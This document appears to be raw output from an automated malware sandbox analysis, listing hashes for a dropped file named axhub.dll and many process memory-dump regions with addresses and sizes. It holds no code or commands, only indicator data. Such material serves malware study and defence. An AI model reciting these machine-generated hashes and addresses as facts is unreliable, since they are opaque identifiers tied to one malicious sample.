                                                                                                                      • \Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                        MD5

                                                                                                                        1c7be730bdc4833afb7117d48c3fd513

                                                                                                                        SHA1

                                                                                                                        dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                        SHA256

                                                                                                                        8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                        SHA512

                                                                                                                        7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                      • memory/648-157-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/684-405-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/708-131-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        100KB

                                                                                                                      • memory/708-117-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/708-130-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        572KB

                                                                                                                      • memory/708-137-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.1MB

                                                                                                                      • memory/708-134-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.5MB

                                                                                                                      • memory/708-135-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        100KB

                                                                                                                      • memory/708-132-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        100KB

                                                                                                                      • memory/708-136-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        152KB

                                                                                                                      • memory/708-133-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        100KB

                                                                                                                      • memory/784-148-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/872-307-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1008-334-0x00000196C6940000-0x00000196C69B4000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        464KB

                                                                                                                      • memory/1008-205-0x00000196C6810000-0x00000196C6881000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/1084-352-0x0000022C8DFA0000-0x0000022C8E014000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        464KB

                                                                                                                      • memory/1084-204-0x0000022C8DEB0000-0x0000022C8DF21000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/1108-146-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1112-145-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1140-210-0x0000026E3D570000-0x0000026E3D5E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/1140-349-0x0000026E3DB40000-0x0000026E3DBB4000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        464KB

                                                                                                                      • memory/1176-223-0x00000217A10D0000-0x00000217A1141000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/1176-372-0x00000217A11C0000-0x00000217A1234000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        464KB

                                                                                                                      • memory/1412-224-0x00000211C2270000-0x00000211C22E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/1420-211-0x000002BC1B0A0000-0x000002BC1B111000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/1688-197-0x0000000000400000-0x00000000008F2000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4.9MB

                                                                                                                      • memory/1688-155-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1688-176-0x0000000000900000-0x0000000000A4A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.3MB

                                                                                                                      • memory/1816-158-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1948-365-0x00000288ECD40000-0x00000288ECDB4000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        464KB

                                                                                                                      • memory/1948-222-0x00000288EC7D0000-0x00000288EC841000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/1960-407-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2052-348-0x0000000000400000-0x0000000002C7B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        40.5MB

                                                                                                                      • memory/2052-358-0x0000000007302000-0x0000000007303000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2052-330-0x0000000002C80000-0x0000000002DCA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.3MB

                                                                                                                      • memory/2052-234-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2052-367-0x0000000007300000-0x0000000007301000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2052-377-0x0000000007304000-0x0000000007306000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/2052-371-0x0000000007303000-0x0000000007304000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2096-233-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2104-231-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2104-327-0x00000000001C0000-0x00000000001CA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        40KB

                                                                                                                      • memory/2152-506-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2160-147-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2180-351-0x0000000007440000-0x0000000007441000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2180-361-0x0000000007443000-0x0000000007444000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2180-357-0x0000000004B50000-0x0000000004B6A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        104KB

                                                                                                                      • memory/2180-354-0x0000000007442000-0x0000000007443000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2180-346-0x0000000004AC0000-0x0000000004ADB000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        108KB

                                                                                                                      • memory/2180-232-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2180-375-0x0000000007444000-0x0000000007446000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/2180-328-0x0000000002DD0000-0x0000000002F1A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.3MB

                                                                                                                      • memory/2180-344-0x0000000000400000-0x0000000002C83000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        40.5MB

                                                                                                                      • memory/2220-264-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2224-324-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        36KB

                                                                                                                      • memory/2224-325-0x0000000000402E1A-mapping.dmp
                                                                                                                      • memory/2232-238-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2232-335-0x0000000000400000-0x0000000002C63000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        40.4MB

                                                                                                                      • memory/2336-152-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2376-166-0x000000001B8D0000-0x000000001B8D2000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/2376-156-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2376-163-0x0000000000C10000-0x0000000000C11000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2528-207-0x0000019512270000-0x00000195122E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2528-338-0x0000019512940000-0x00000195129B4000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        464KB

                                                                                                                      • memory/2536-209-0x00000204664A0000-0x0000020466511000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2536-343-0x0000020466580000-0x00000204665F4000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        464KB

                                                                                                                      • memory/2560-280-0x0000000005220000-0x0000000005221000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2560-236-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2560-286-0x0000000004D20000-0x000000000521E000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        5.0MB

                                                                                                                      • memory/2560-282-0x0000000004D20000-0x0000000004D21000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2560-288-0x0000000004D00000-0x0000000004D01000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2560-275-0x00000000003C0000-0x00000000003C1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2696-331-0x000001617ABA0000-0x000001617AC14000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        464KB

                                                                                                                      • memory/2696-203-0x000001617A770000-0x000001617A7E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2772-114-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2780-225-0x000002B7E0530000-0x000002B7E05A1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2792-395-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2792-545-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2800-226-0x0000024037E00000-0x0000024037E71000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2808-509-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2808-503-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2808-168-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2976-198-0x00000270DF8D0000-0x00000270DF91C000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        304KB

                                                                                                                      • memory/2976-200-0x00000270DF990000-0x00000270DFA01000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/2976-318-0x00000270DF5B0000-0x00000270DF5B4000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        16KB

                                                                                                                      • memory/2976-317-0x00000270DF5B0000-0x00000270DF5B1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2976-316-0x00000270DF600000-0x00000270DF604000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        16KB

                                                                                                                      • memory/2976-323-0x00000270DF540000-0x00000270DF544000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        16KB

                                                                                                                      • memory/2984-230-0x0000000001310000-0x0000000001325000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        84KB

                                                                                                                      • memory/2992-165-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3280-453-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3864-177-0x0000000000400000-0x0000000000896000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4.6MB

                                                                                                                      • memory/3864-151-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3864-174-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        36KB

                                                                                                                      • memory/3940-149-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3972-150-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3996-240-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3996-333-0x0000000002D40000-0x0000000002DAF000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        444KB

                                                                                                                      • memory/4040-144-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4112-195-0x0000000004E0A000-0x0000000004F0B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.0MB

                                                                                                                      • memory/4112-196-0x0000000004C80000-0x0000000004CDD000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        372KB

                                                                                                                      • memory/4112-173-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4132-235-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4132-296-0x0000000004BA0000-0x0000000004BA1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4132-279-0x00000000001C0000-0x00000000001C1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4132-293-0x0000000000AF0000-0x0000000000AF1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4132-284-0x0000000004A50000-0x0000000004A51000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4136-239-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4144-399-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4144-465-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4156-406-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4208-341-0x0000017EC8DB0000-0x0000017EC8E7F000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        828KB

                                                                                                                      • memory/4208-339-0x0000017EC8D40000-0x0000017EC8DAE000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        440KB

                                                                                                                      • memory/4208-291-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4212-326-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4224-181-0x00007FF756E24060-mapping.dmp
                                                                                                                      • memory/4224-202-0x0000019406770000-0x00000194067E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        452KB

                                                                                                                      • memory/4304-295-0x000001E05AAD0000-0x000001E05AB44000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        464KB

                                                                                                                      • memory/4304-283-0x00007FF756E24060-mapping.dmp
                                                                                                                      • memory/4304-290-0x000001E05A7F0000-0x000001E05A83E000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        312KB

                                                                                                                      • memory/4428-294-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4456-297-0x0000000000400000-0x000000000067D000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        2.5MB

                                                                                                                      • memory/4456-436-0x0000000003880000-0x0000000003890000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/4456-292-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4456-430-0x00000000036E0000-0x00000000036F0000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/4484-455-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4552-258-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4576-397-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4580-337-0x0000000004900000-0x000000000499D000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        628KB

                                                                                                                      • memory/4580-262-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4580-360-0x0000000000400000-0x0000000002CBF000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        40.7MB

                                                                                                                      • memory/4592-261-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4604-310-0x00000000052F0000-0x00000000052F1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4604-321-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4604-304-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        120KB

                                                                                                                      • memory/4604-313-0x0000000004DE0000-0x0000000004DE1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4604-314-0x0000000004CE0000-0x00000000052E6000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        6.0MB

                                                                                                                      • memory/4604-311-0x0000000004D40000-0x0000000004D41000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4604-312-0x0000000004DA0000-0x0000000004DA1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4604-305-0x0000000000418E3E-mapping.dmp
                                                                                                                      • memory/4628-259-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4628-300-0x0000000005200000-0x0000000005201000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4628-276-0x0000000000640000-0x0000000000641000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4628-298-0x0000000004ED0000-0x0000000004ED2000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/4628-285-0x0000000004F20000-0x0000000004F21000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4632-402-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4636-448-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4676-308-0x0000000003260000-0x00000000033AA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.3MB

                                                                                                                      • memory/4676-315-0x0000000000400000-0x000000000325A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        46.4MB

                                                                                                                      • memory/4676-260-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4736-320-0x00000000008C0000-0x00000000008EF000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        188KB

                                                                                                                      • memory/4736-263-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4736-322-0x0000000000400000-0x00000000008AA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4.7MB

                                                                                                                      • memory/4796-394-0x0000000000400000-0x0000000000455000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        340KB

                                                                                                                      • memory/4796-393-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4828-487-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4912-227-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4964-502-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4992-451-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5092-342-0x0000000000000000-mapping.dmp